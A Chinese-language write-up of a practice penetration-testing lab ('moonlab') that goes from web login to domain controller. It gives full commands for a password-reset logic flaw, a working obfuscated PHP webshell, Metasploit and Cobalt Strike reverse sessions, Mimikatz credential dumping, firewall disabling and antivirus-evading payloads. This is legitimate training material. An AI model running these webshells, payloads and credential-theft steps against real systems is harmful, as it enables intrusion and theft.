Author:一条’小龍龙
Team:Traceless 网络安全团队
Data:2023/9/23
Description:暗月2020最新渗透测试项目七的内网渗透
环境配置
环境地址
链接:https://pan.baidu.com/s/1GbrW9l0lv22mh7BfltUPfA
提取码:long
靶场拓扑图
任务目标
最终目标即获取域控中的flag.txt
文件内容
准备工作
1.将攻击机中的hosts文件中配置靶机域名解析(IP为靶机IP)
www.moonlab.com 192.168.3.30
2.三台靶机都需要登录一遍(用本地账户和域账户登录),这样后期猕猴桃才能抓取到账户密码hash
Write-Up
step 1 信息收集 - web
在排除其他非环境内的设备的IP
后,确定靶机的IP
地址
本机IP地址为 192.168.3.27
扫描内网主机设备 确定web靶机的IP
nmap -T4 -sn 192.168.3.0/24 --min-rate 100
扫描后得知,靶机IP
为192.168.3.30
扫描开放的端口信息
nmap -T4 -sV 192.168.3.30 -p 1-65535
深度扫描该靶机的详细信息
nmap -T4 -sV -sC -A 192.168.3.30 -p 21,80,999,5985,6585 -oA attack-ports
访问robots.txt
文件
访问SiteServer
目录 发现跳转至登录页面
step 2 渗透测试 - web
因为网站装有防护软件,所以尽量不要爆破
在当前登陆界面,我们发现会有一个忘记密码的选项
我们通过该选项,看是否会有逻辑漏洞(如密码找回逻辑存在漏洞),通过该漏洞从而获取或修改用户密码
打开BurpSuite
,等待抓包
猜测用户名为admin,点击下一步
将抓到的包放掉
随便输入一下,下一步
发现Answer=123
该传参键值对,把123删掉后放包
此时,我们看到了页面出现了账号密码。说明该处存在账号密码找回逻辑漏洞
利用该账号密码,我们成功登陆了后台
step 3 上传webshell并连接 - web
一般来说,登陆后台后,首先就要看看有没有地方能上传文件,然后想尽办法上传webshell。或者找到能够修改网页内容的地方,添加上webshell即可。
这里,我们新建模板文件,在文件中写入webshell即可
在显示管理 --> 模板管理中,新建单页模板
内容如下
保存后 即可看到新加的webshell模板
点击模板名称webshell,即可跳转至改模板的URL地址
用冰蝎输入地址及密码即可连接
连接成功后如下所示
step 4 利用冰蝎反弹shell给MSF - web
我们点击反弹shell功能 输入以下内容
打开msf,进行一下操作
此时,我们在冰蝎 反弹shell 模块处点击 给我连
此时连接成功
step 5 提权与进程迁移 - web
获取相关信息
在获取系统权限后,我们对其进行了信息收集
得知了系统是64位,相关版本及补丁,IP地址等信息
查看ps进程
迁移到64位进程 并加载猕猴桃插件
migrate 780
load kiwi
step 6 利用猕猴桃获取系统账户hash
- web
查看主机中有哪些用户
run post/windows/gather/enum_logged_on_users
creds_all
通过 creds_all
我们得知了administrator账号的密码为!@#QWE123
step 7 MSF转CS
CS端
启动CS服务器
启动CS客户端
输入服务器IP、端口、账号及密码后,点击连接
新建监听器
MSF端
bg
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.3.27 //CS服务器地址
set LPORT 10000 //随意设置监听端口,需要和cs保持一致
set session 1 //设置需要用的SESSION
set DisablePayloadHandler true //禁止产生一个新的handler
run
CS 上线
会话间隔设置为1
在会话交互中执行以下命令获取管理员密码hash明文
hashdump
logonpasswords
密码凭证处可以看到账号密码
step 8 添加路由并对内网主机进行探测
查看session,并回到192.168.3.30
的主机控制台
添加路由
run post/multi/manage/autoroute
bg
route print
扫描内网10.10.1.0/24
网段中存活的主机
use auxiliary/scanner/discovery/udp_sweep
set rhost 10.10.1.2-254
run
发现主机10.10.1.130
还有一种方式可以通过arp获取
step 9 设置socks5代理并通过代理进行相关操作
设置socks5代理
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1080
run
配置 proxychains
代理
使用代理扫描端口开放信息(扫了两次结果都一样,估计是有防火墙)
目标机禁用ping,绕过ping 进行特定端口扫描
proxychains nmap -sT -Pn 10.10.1.130 -p 21,22,80,443,445,135,110,3389 --min-rate 1000 --open
发现目前只能看到80端口
开放了
edge浏览器配置SwitchyOmega扩展如下
应用该代理设置后即可访问
step 10 漏洞探测与利用 - oa
根据网页标题可知这个是通达OA网络智能办公系统,我们查找相关CMS漏洞
RCE利用工具地址
https://github.com/Al1ex/TongDa-RCE
proxychains python tongda_rce.py http://10.10.1.130
proxychains python tongda_shell.py http://10.10.1.130
用蚁剑连接失败,应该是被防火墙杀了
无妨,我们看看tongda_shell.py
源码 给它修改一下
这里把base64解密后,写入到了404.php文件中
我们新建一个冰蝎的webshell php文件
把生成的文件内容复制一下
<?php @error_reporting(0);session_start();$key="1a1dc91c907325c6";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$H2C51=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$H2C51=$t($H2C51."");for($i=0;$i<strlen($H2C51);$i++) { $new_key = $key[$i+1&15];$H2C51[$i] = $H2C51[$i] ^ $new_key;} }else{ $H2C51=openssl_decrypt($H2C51, "AES128", $key);}$arr=explode('|',$H2C51);$func=$arr[0];$params=$arr[1];class G1350V58{ public function __invoke($p) {@eval("/*Z4M14g6s68*/".$p."");}}@call_user_func/*Z4M14g6s68*/(new G1350V58(),$params);?>
打开编码工具对其进行base64加密
把加密后的内容跟之前的内容进行替换
再次运行后,使用冰蝎连接(密码是我们自己设的 pass
)
连接成功 可以看到我们当前为系统权限,无需提权
step 11 信息收集 - oa
查看系统信息
net start #查看启动的服务
tasklist /svc #开启的进程
ipconfig /all
netstat -ano
信息整理
oa服务器所在域为 attack.local
双网卡,两个IP分别为10.10.1.130和10.10.10.166
当前身份权限为system权限
存在安全防护软件,如 360 安全卫士,360 杀毒软件,windows firewall 等
step 12 免杀
上线前先kill Windows防火墙
NetSh Advfirewall set allprofiles state off
然后我们再指定扫描一下开放端口信息 之前110是扫不到的,现在可以了
制作MSF免杀木马
msfvenom -p windows/meterpreter/bind_tcp LPORT=5555 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt
打开生成后的shellcode复制一下
用掩杀2.0免杀生成exe可执行程序
将生成好的木马axr.exe
并上传至目标主机C:\目录下
step 13 MSF、CS上线 - oa
打开MSF
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.1.130
set lport 5555
exploit
在冰蝎终端运行木马
MSF上线后,查看进程
getuid
ps
migrate 1964 (64位进程pid)
load kiwi 加载猕猴桃插件
creds_all
添加路由
run autoroute -s 10.10.10.0/24
run autoroute -p
上线CS
新建监听器oa 端口自定义
生成Windows 可执行程序(Stageless)
选择监听器oa 生成即可
MSF上传木马程序到目标主机C盘根目录下
进入shell,执行CS木马
CS端 点击会话交互
在下方beacon>
处输入
connect 10.10.1.130 10001
CS成功上线
step 14 信息收集 - oa
查看网卡/IP
两个网卡,分别为10.10.1.130
和10.10.10.166
发现该主机存在域
存在域attack
run post/windows/gather/enum_domain
run post/windows/gather/enum_logged_on_users #登陆域的用户信息
net domain_controllers
查看DC 3389端口开放情况
step 15 查看hash密码
CS端抓取hash、明文,查看密码凭证
OA 账号为administrator,密码为!@#Q123
ATTACK账号位administrator,密码为!@#QWEasd123.
step 16 设置代理远程控制DC
在 proxifier
上配置代理服务器
设置代理规则
打开cmd输入mstsc回车
输入IP地址10.10.1.130
回车
拿下域控!
查看flag
flag is flag{moon-a81c3d94aa192d3f87ed9f2fffec04fc}